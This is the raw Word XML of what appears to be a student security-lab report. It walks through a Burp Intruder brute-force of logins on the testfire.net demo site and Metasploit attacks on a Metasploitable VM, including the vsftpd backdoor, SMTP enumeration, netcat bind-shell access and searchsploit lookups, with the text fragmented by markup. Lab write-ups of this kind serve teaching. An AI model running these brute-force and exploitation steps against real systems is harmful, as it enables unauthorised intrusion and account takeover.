            <wp:docPr id="1080199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B2E" w14:textId="5073FEBF" w:rsidR="001C258F" w:rsidRPr="00244EB6" w:rsidRDefault="001C258F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0D00C6B9" w14:textId="1411E198" w:rsidR="001C258F" w:rsidRDefault="001C258F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Here we send the output to the intruder. In intruder we have 2 sets of payloads one is for user id and the other is for passwords. </w:t>
      </w:r>
      <w:r w:rsidR="00BD79F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>For each payload give different usernames and passwords in the payload options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D083321" w14:textId="12B496B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Here payload 1 is for the user id and the payload 2 is for the passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350693FE" w14:textId="7777777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1683BF43" w14:textId="786E1766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6E9C5F4" wp14:editId="42B2D060">
            <wp:extent cx="5302250" cy="2982442"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="447142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29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BC0" w14:textId="45C7BDA3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37739F" wp14:editId="0ED96A17">
            <wp:extent cx="5327650" cy="2996729"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="10454775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2" cy="30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52FD" w14:textId="3E7966D2" w:rsidR="00BD79F2" w:rsidRPr="00244EB6" w:rsidRDefault="00BD79F2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26A54D0" w14:textId="543DA670" w:rsidR="00BD79F2" w:rsidRP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After setting the payloads, we will start our attack by clicking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start attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">. And in other window we can see results. In the results, all the lengths are the same i.e. 125 except for one which is 216 and the one with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>length 216 is the user id and password of the testfire.net</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F2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546E242" w14:textId="57618B37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C90A57D" wp14:editId="2B362621">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="43042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4E8" w14:textId="1553E634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E21785" wp14:editId="21511402">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21044912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38F" w14:textId="4702376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3B145E2F" w14:textId="176DFCE8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718BFCDC" w14:textId="2270870C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1F9AC67" w14:textId="7257CB7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2D25DBEA" w14:textId="20727CB2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63268696" w14:textId="58062519" w:rsidR="00BD79F2" w:rsidRDefault="00BD79F2" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534AFCD3" w14:textId="77777777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4. Perform Exploiting Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E0D6C" w14:textId="5E0B1904" w:rsidR="00BD79F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a) Exploiting Metasploit using FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB98A0" w14:textId="4ADC9B84" w:rsidR="004032A2" w:rsidRPr="00244EB6" w:rsidRDefault="004032A2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C47010E" w14:textId="3770DB0F" w:rsidR="004032A2" w:rsidRPr="00EA33BC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4" w:name="_Hlk131186783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="00EA33BC"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="00EA33BC"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="00EA33BC"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="00EA33BC"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 w:rsidR="00EA33BC"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4"/>
    <w:p w14:paraId="6EF3CF37" w14:textId="5DFD35E2" w:rsidR="004032A2" w:rsidRDefault="004032A2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CFF16E2" wp14:editId="573D1937">
            <wp:extent cx="3363362" cy="2672953"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="20267057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r="59146" b="28468"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3370569" cy="2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1650" w14:textId="41DDEC4C" w:rsidR="00EA33BC" w:rsidRPr="00244EB6" w:rsidRDefault="00EA33BC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BEF2B4" w14:textId="23467222" w:rsidR="00EA33BC" w:rsidRP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  <w:bookmarkStart w:id="5" w:name="_Hlk131186862"/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bookmarkEnd w:id="5"/>
    <w:p w14:paraId="66F78CB5" w14:textId="7E6DFAF3" w:rsidR="00EA33BC" w:rsidRDefault="00EA33BC" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="593DC15C" wp14:editId="6E5999CB">
            <wp:extent cx="4558420" cy="2527969"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="14311265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3" r="45735" b="17317"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4570930" cy="25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465E" w14:textId="72A59F68" w:rsidR="00EA33BC" w:rsidRPr="00244EB6" w:rsidRDefault="00542EEA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6E14294" w14:textId="4F942A6E" w:rsidR="00542EEA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look for the port 21 whether it is vulnerable to exploit using the comman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p 21 –script vul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F54D5D" w14:textId="54548965" w:rsidR="00542EEA" w:rsidRDefault="0072357E" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A27BEFC" wp14:editId="71D69479">
            <wp:extent cx="3490111" cy="1574800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="13178160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14629" r="39394" b="28162"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3491738" cy="15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ADBC" w14:textId="77777777" w:rsidR="00542EEA" w:rsidRDefault="00542EEA" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1726D703" w14:textId="119C2A7C" w:rsidR="00542EEA" w:rsidRPr="00244EB6" w:rsidRDefault="0072357E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2F168BCC" w14:textId="0ECCDDF5" w:rsidR="0072357E" w:rsidRP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vsfpd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exploit/unix/ftp/vsftpd_234_backdoo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A8E5694" w14:textId="77777777" w:rsidR="0072357E" w:rsidRDefault="0072357E" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AB5304" w14:textId="646BBF04" w:rsid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3F3659" wp14:editId="618AE378">
            <wp:extent cx="2969537" cy="1746885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="18509001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19888" r="48091" b="16657"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2970639" cy="17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7FE0" w14:textId="77777777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B1C141A" w14:textId="4AE414B0" w:rsidR="0072357E" w:rsidRPr="00244EB6" w:rsidRDefault="0072357E" w:rsidP="004032A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EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>STEP 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2681C9" w14:textId="024DAC81" w:rsidR="00084D05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the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ollowed by the ip address of the metasploitable machine</w:t>
      </w:r>
      <w:r w:rsidR="00084D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. Now when we see the options we see that the RHOSTS is set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F64C5" w14:textId="67088957" w:rsidR="0072357E" w:rsidRDefault="0072357E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DE6B8B" wp14:editId="7BF39690">
            <wp:extent cx="3530278" cy="2023450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8778052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8" r="37526"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3539929" cy="20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CE0F" w14:textId="4F995CAA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6:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984CC8F" w14:textId="0BB0C32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have to for the payloads by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how payload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command and we have to use the payload name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payload/cmd/unix/interac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After this we run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exploi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nd the metasploitable system is exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066B01E" w14:textId="69E8A349" w:rsidR="00084D05" w:rsidRP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3BE0036" wp14:editId="63383DFC">
            <wp:extent cx="3995916" cy="3186820"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="20890248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2028"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="40014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1DF0" w14:textId="173BA781" w:rsidR="00EA33BC" w:rsidRDefault="00EA33BC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6695CEC3" w14:textId="1C29F2F2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1059FB2B" w14:textId="67055E83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407A2C7" w14:textId="43FC884E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A05F446" w14:textId="6178F666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78918024" w14:textId="00EDE429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4156AEC5" w14:textId="357B860C" w:rsidR="00084D05" w:rsidRDefault="00084D05" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ED24E6D" w14:textId="7FAEDDD6" w:rsidR="00084D05" w:rsidRPr="00244EB6" w:rsidRDefault="00084D05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b) Exploiting Metasploit using SMTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7281589E" w14:textId="5381837F" w:rsidR="00084D05" w:rsidRPr="00244EB6" w:rsidRDefault="005207BD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060E9262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E132C36" w14:textId="21723A4D" w:rsidR="00A77F20" w:rsidRDefault="00A77F20" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="164EB0C3" wp14:editId="63DFF2CB">
            <wp:extent cx="2123038" cy="1846907"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="11862821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4436" r="62874" b="28524"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2123307" cy="18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75D5" w14:textId="614AD000" w:rsidR="00A77F20" w:rsidRDefault="00A77F20" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1A6A5E" w14:textId="153E053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306D9C8F" w14:textId="77777777" w:rsidR="00A77F20" w:rsidRPr="00EA33BC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196AAED2" w14:textId="77777777" w:rsidR="00A77F20" w:rsidRDefault="00A77F20" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075B41FD" w14:textId="7DDB7448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FFD3107" wp14:editId="55D8EBD0">
            <wp:extent cx="4122347" cy="2227153"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="15372981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19879" r="44065" b="17347"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4135894" cy="22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F9AC" w14:textId="5E5F1DB7" w:rsidR="00A77F20" w:rsidRDefault="00A77F2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203D458" w14:textId="695F2261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38B8090C" w14:textId="7D2CF8A3" w:rsidR="00A77F20" w:rsidRPr="0072357E" w:rsidRDefault="00A77F20" w:rsidP="00A77F20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Hlk131188602"/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smtp/smtp_enu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6"/>
    <w:p w14:paraId="01B6C22D" w14:textId="62728D21" w:rsidR="00A77F20" w:rsidRPr="00A77F20" w:rsidRDefault="00A77F2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F9D0EA4" wp14:editId="1D28ABA4">
            <wp:extent cx="1588393" cy="1797087"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21138167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19879" r="67614" b="3714"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1590627" cy="17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4315" w14:textId="33C6AB9B" w:rsidR="00A77F20" w:rsidRDefault="00A77F20" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B224D6" wp14:editId="383C032E">
            <wp:extent cx="4430568" cy="2317115"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6985"/>
            <wp:docPr id="9998468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" t="12980" r="22424" b="2884"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4432639" cy="23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94D8" w14:textId="34AB65BA" w:rsidR="00A77F20" w:rsidRPr="00244EB6" w:rsidRDefault="00A77F2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068D524E" w14:textId="6096BBFF" w:rsidR="007C2C4B" w:rsidRPr="00F61CE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7" w:name="_Hlk131188754"/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>. Now in options we see that the RHOSTS is set.</w:t>
      </w:r>
      <w:r w:rsidR="00F61CEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then we give the command </w:t>
      </w:r>
      <w:r w:rsidR="00F61CEC"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 w:rsidR="00F61CEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="4F9CAF67" w14:textId="34E81DA7" w:rsidR="00A77F20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F26D08" wp14:editId="4B886FCB">
            <wp:extent cx="5452889" cy="1860513"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="13172240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29080" r="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544159" cy="1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65C2B" w14:textId="308F263F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25246EA2" w14:textId="01B4F4FA" w:rsidR="007C2C4B" w:rsidRPr="007C2C4B" w:rsidRDefault="007C2C4B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open the new terminal window and run the command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nc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along with your ip address. We have exploited the metasploitable machine using </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2C4B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>smtp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8836351" w14:textId="1626D02C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597A2BE" wp14:editId="616D136D">
            <wp:extent cx="5731510" cy="2755265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="12427775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E80C" w14:textId="0C2F10D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4A4F074" w14:textId="46A9536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8F17846" w14:textId="129FF7D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DF2ACFF" w14:textId="01E38297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0158711" w14:textId="24EB511A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930638" w14:textId="0D627FE4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6D116E3" w14:textId="6E67B9C2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1C4E49A1" w14:textId="026B6C99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E31EB84" w14:textId="0C25212B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07761C8E" w14:textId="59323453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60E2B97" w14:textId="18AB3F16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C9FF2F3" w14:textId="2AD23BC8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c) Exploiting Metasploit using Blind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C3EDF" w14:textId="4A18FC3D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1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598D51FD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bookmarkStart w:id="8" w:name="_Hlk131188410"/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bookmarkEnd w:id="8"/>
    <w:p w14:paraId="1339CC62" w14:textId="0C7E399E" w:rsidR="007C2C4B" w:rsidRDefault="007C2C4B" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BBEED38" wp14:editId="669F68A4">
            <wp:extent cx="2064190" cy="1792586"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13418924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4171" r="64142" b="30909"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2064641" cy="17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8AF9" w14:textId="29527104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12CAB084" w14:textId="77777777" w:rsidR="007C2C4B" w:rsidRPr="00EA33BC" w:rsidRDefault="007C2C4B" w:rsidP="007C2C4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will use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nmap -sV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o check the ports, state and the services the ports provide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE1135" w14:textId="4EAF315E" w:rsidR="007C2C4B" w:rsidRDefault="007C2C4B" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F8F102A" wp14:editId="3E6BF552">
            <wp:extent cx="3218507" cy="1729212"/>
            <wp:effectExtent l="0" t="0" r="1270" b="4445"/>
            <wp:docPr id="16412629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9" r="43842" b="5528"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3218678" cy="17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A277" w14:textId="77777777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3BBD732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12CC02E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9E28529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2AB2D88" w14:textId="77777777" w:rsidR="00244EB6" w:rsidRDefault="00244EB6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AC6610C" w14:textId="021B76DA" w:rsidR="007C2C4B" w:rsidRPr="00244EB6" w:rsidRDefault="007C2C4B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546DF010" w14:textId="64A83812" w:rsidR="004D1BD0" w:rsidRPr="004D1BD0" w:rsidRDefault="004D1BD0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run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ncad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, followed by your metasploitable ip address. Now you have exploited the metasploitable machine using blindshell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680716A" w14:textId="5F9B5D9F" w:rsidR="004D1BD0" w:rsidRDefault="004D1BD0" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6264A17C" w14:textId="7FC8547E" w:rsidR="004D1BD0" w:rsidRDefault="004D1BD0" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="435E71AA" wp14:editId="2A1BC57B">
            <wp:extent cx="3173240" cy="2209667"/>
            <wp:effectExtent l="0" t="0" r="8255" b="635"/>
            <wp:docPr id="9920707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43702" r="61840" b="908"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3229317" cy="2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09A9" w14:textId="3BCE0DC0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0A0E04A" w14:textId="247BE521" w:rsidR="007C2C4B" w:rsidRDefault="007C2C4B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011ED9E" w14:textId="0AD59CF2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FF29B86" w14:textId="5945329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EB23BDF" w14:textId="26AFA744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BB09998" w14:textId="01013769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6B76CCC" w14:textId="65D583AF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4B29B10B" w14:textId="1979DAB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72C7C77C" w14:textId="753CE4AB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D6171" w14:textId="4E30067D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2375CC78" w14:textId="7931D00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66D6B515" w14:textId="77777777" w:rsidR="00244EB6" w:rsidRDefault="00244EB6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56F843C8" w14:textId="2BFEBE49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d) Exploiting Metasploit using HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E3EFB" w14:textId="27B80C50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STEP 1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182AF919" w14:textId="77777777" w:rsidR="004D1BD0" w:rsidRPr="00EA33BC" w:rsidRDefault="004D1BD0" w:rsidP="004D1BD0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ABD2A95" w14:textId="66F7FEC3" w:rsidR="004D1BD0" w:rsidRDefault="004D1BD0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2F56EDB" wp14:editId="2CAAB69B">
            <wp:extent cx="2322214" cy="1883121"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3175"/>
            <wp:docPr id="4186687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3286" r="59558" b="28361"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2322450" cy="18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E0EF" w14:textId="77777777" w:rsidR="004D1BD0" w:rsidRDefault="004D1BD0" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8AA9FA" w14:textId="1DD7C25B" w:rsidR="004D1BD0" w:rsidRPr="00244EB6" w:rsidRDefault="004D1BD0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2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947DD6B" w14:textId="435D2008" w:rsidR="004A4454" w:rsidRPr="004A4454" w:rsidRDefault="004A4454" w:rsidP="004032A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go to Firefox and go to this site </w:t>
      </w:r>
      <w:r w:rsidRPr="00097CB4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“your ip address”/php/phpinfo.php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. Here we get information about our php version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED36931" w14:textId="6522ABD5" w:rsidR="004D1BD0" w:rsidRPr="007C2C4B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0ADC11E" wp14:editId="7DC230D1">
            <wp:extent cx="5731510" cy="2755265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="21207535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2877" w14:textId="77777777" w:rsidR="00A77F20" w:rsidRDefault="00A77F20" w:rsidP="004032A2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5A2994" w14:textId="6560712F" w:rsidR="00A77F20" w:rsidRPr="00244EB6" w:rsidRDefault="004A4454" w:rsidP="004032A2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3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3562F637" w14:textId="4C609B75" w:rsidR="004A4454" w:rsidRPr="0072357E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ow we open the msfconsole, and then search for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http scanne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We have to use th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auxiliary/scanner/http/http_versio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which we get it around #168 by the command </w:t>
      </w:r>
      <w:r w:rsidRPr="0072357E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>u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14:paraId="3FE30A57" w14:textId="77777777" w:rsidR="004A4454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</w:p>
    <w:p w14:paraId="3898788D" w14:textId="48B09153" w:rsidR="004A4454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3A02088" wp14:editId="0E1EC9B8">
            <wp:extent cx="4202012" cy="1787525"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
            <wp:docPr id="8511355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5" r="26666"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4203152" cy="17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B531" w14:textId="4D9B59B8" w:rsidR="005207BD" w:rsidRDefault="004A4454" w:rsidP="004032A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7716725" wp14:editId="30C6CA15">
            <wp:extent cx="5731510" cy="2755265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="9898652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068C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2866036E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11DB2784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053AF4B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4D33CCED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361710" w14:textId="77777777" w:rsidR="00244EB6" w:rsidRDefault="00244EB6" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C197E20" w14:textId="5749906A" w:rsidR="004A4454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4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC0E3B" w14:textId="5FB864BA" w:rsidR="004A4454" w:rsidRPr="004A4454" w:rsidRDefault="004A4454" w:rsidP="004A445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We should see the options available and we get to know that we should set RHOSTS. So we should set the RHOSTS by the command </w:t>
      </w:r>
      <w:r w:rsidRPr="00084D05">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>set RHOST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Now run it by the command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run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7252229C" w14:textId="26D8B096" w:rsidR="004A4454" w:rsidRPr="00E70875" w:rsidRDefault="004A4454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0A72AF5" wp14:editId="28747FC4">
            <wp:extent cx="3573031" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="4079402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32420" r="37723" b="26907"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3574658" cy="1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1255" w14:textId="77777777" w:rsidR="00FB4756" w:rsidRDefault="00FB4756" w:rsidP="00654C64">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F4CD45" w14:textId="11730080" w:rsidR="00FB4756" w:rsidRPr="00244EB6" w:rsidRDefault="004A4454" w:rsidP="00654C6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noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>STEP 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6EE61" w14:textId="20671785" w:rsidR="004A4454" w:rsidRPr="00727F0C" w:rsidRDefault="00244EB6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In a new terminal window, g</w:t>
      </w:r>
      <w:r w:rsidR="004A4454">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">o for 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the access of root using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="00727F0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. Then use the command </w:t>
      </w:r>
      <w:r w:rsidR="00727F0C" w:rsidRPr="00727F0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>searchsploit apache 2.2.8 | grep.php</w:t>
      </w:r>
      <w:r w:rsidR="00727F0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. From this we get to know the php version we are using.</w:t>
      </w:r>
    </w:p>
